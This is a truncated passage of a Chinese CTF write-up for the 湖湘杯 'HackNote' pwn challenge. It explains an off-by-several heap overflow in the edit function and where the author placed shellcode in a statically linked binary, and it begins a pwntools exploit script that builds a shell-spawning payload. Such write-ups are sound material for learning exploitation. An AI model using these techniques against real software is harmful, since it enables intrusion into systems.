湖湘杯 wp

历时12h，两道pwn。比赛如何不评价，默默做题。 HackNote题目有add、delete、edit 啥保护也没开，有问题 edit里平白无故多算一次size，很有问题，可以构造off by 好几个 此外这题的难点还在于这题是静态编译的，shellcode不知道往哪写，我一开始找了几个静态的地方，等我想调用它的时候吧，内容就变了。反正后来就随便找到一40的size位就用上了，是IOFILE前面的地方。 from pwn import * context.log_level = 'debug' context(arch = 'amd64', os = 'linux') shellcode=asm(shellcraft.sh()) debug=1 if d..